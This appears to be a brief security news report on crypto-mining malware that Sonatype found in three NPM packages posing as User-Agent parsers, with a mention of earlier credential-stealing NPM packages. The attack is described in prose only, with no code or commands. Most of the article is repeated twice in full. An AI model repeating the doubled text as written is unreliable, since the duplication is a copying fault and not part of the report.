The packages were uploaded to the repository on October 15, but were immediately identified by researchers.
Sonatype discovered cryptocurrency mining software in three JavaScript libraries uploaded to the official NPM repository.
Malicious packages called okhsa, klow and klown were disguised as User-Agent header parsers and uploaded by the same author on October 15th. The malicious packages were noticed almost immediately by researchers who reported them to the NPM administration. The administration promptly removed the malicious packages from the repository, but by that time they had already been downloaded more than 150 times in total.
Only the klow and klown packages contained malicious code, which were used as dependencies in the okhsa package.
As the experts explained, depending on the platform used (Windows or Unix-like system), a .bat or .sh script was loaded onto the user's system, which downloaded EXE or Linux ELF files from an external host and executed them with arguments pointing to the mining pool, address cryptocurrency wallet and the number of processor threads to use.
Recall that in July of this year, two malicious NPM packages were found in the NPM repository, capable of stealing credentials from Google Chrome browsers on Windows systems, as well as installing a backdoor for further spyware activity.
Sonatype discovered cryptocurrency mining software in three JavaScript libraries uploaded to the official NPM repository.
Malicious packages called okhsa, klow and klown were disguised as User-Agent header parsers and uploaded by the same author on October 15th. The malicious packages were noticed almost immediately by researchers who reported them to the NPM administration. The administration promptly removed the malicious packages from the repository, but by that time they had already been downloaded more than 150 times in total.
Only the klow and klown packages contained malicious code, which were used as dependencies in the okhsa package.
As the experts explained, depending on the platform used (Windows or Unix-like system), a .bat or .sh script was loaded onto the user's system, which downloaded EXE or Linux ELF files from an external host and executed them with arguments pointing to the mining pool, address cryptocurrency wallet and the number of processor threads to use.
Recall that in July of this year, two malicious NPM packages were found in the NPM repository, capable of stealing credentials from Google Chrome browsers on Windows systems, as well as installing a backdoor for further spyware activity.
